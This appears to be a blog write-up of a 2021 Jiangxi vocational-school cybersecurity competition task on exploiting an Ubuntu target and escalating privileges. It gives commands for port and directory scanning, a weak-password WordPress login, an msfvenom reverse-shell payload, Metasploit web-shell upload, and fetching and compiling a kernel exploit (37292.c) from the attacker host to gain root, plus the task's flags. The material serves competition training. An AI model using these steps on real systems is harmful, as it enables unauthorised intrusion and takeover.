2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权

2021年中职"网络安全"江西省赛题—B-1:系统漏洞利用与提权

B-1:系统漏洞利用与提权

任务环境说明:
 服务器场景:PYsystem001
 服务器场景操作系统:Ubuntu(显示链接)
 服务器用户名:未知 密码:未知

  1. 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口…,端口n])提交;

nmap -sV ip 扫描

在这里插入图片描述

  1. 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;

通过题目我们知道靶机有网站,我们利用kali中的dirb扫描网站的后台。
优先扫描特殊端口:dirb http://172.16.105.245:8080/
在这里插入图片描述

扫描出后台地址,通过题目提示弱口令登录
在这里插入图片描述

falg[admin,123456]
4. 利用Kali渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;
这里固定的falg:[Payload]
命令:Msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.103 lport=8888 -f exe -o shell.exe
在这里插入图片描述
5. 对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;

我这里没有用这个上传的,我用的是msf中的wp_admin_shell_upload
set rhost 172.16.105.245
set username admin
set password 123456
set targeturi /wordpress
在这里插入图片描述
shell连接后whoami查看权限
falg[daemon]
在这里插入图片描述
7. 查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;

命令:uname -a查看系统内核版本号
falg[3.13.0]
在这里插入图片描述
8. 在Kali攻击机中查找可使用的漏洞源码,将找到的漏洞源码文件名作为FLAG(形式:[文件名])提交;

利用kali中的searchsploit命令查看可使用的漏洞源码
命令searchsploit 3.13.0
falg[37292.c]
在这里插入图片描述
9. 利用上述漏洞源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;

进入存放漏洞源码的目录 cd /usr/share/exploitdb/exploits/linux/local/
在这里插入图片描述

把源码复制到kali自带的网站目录下 cp 37292.c /var/www/html/
在这里插入图片描述

启动kali的apche服务

在这里插入图片描述

使用python切换至交互式shell
命令:python -c ‘import pty;pty.spawn(“/bin/bash”)’
在这里插入图片描述
使用命令wget把刚刚上传中37292.c文件下载下来

在这里插入图片描述

编译37292.c生成shell文件
运行shell文件,获得root权限
在这里插入图片描述
进入root目录查看txt文件名为adftutij.txt
flag[adftutij.txt]
在这里插入图片描述
11. 利用上述漏洞源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。
cat查看文件内容
flag[hyjufk983]
在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

acaciaf

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值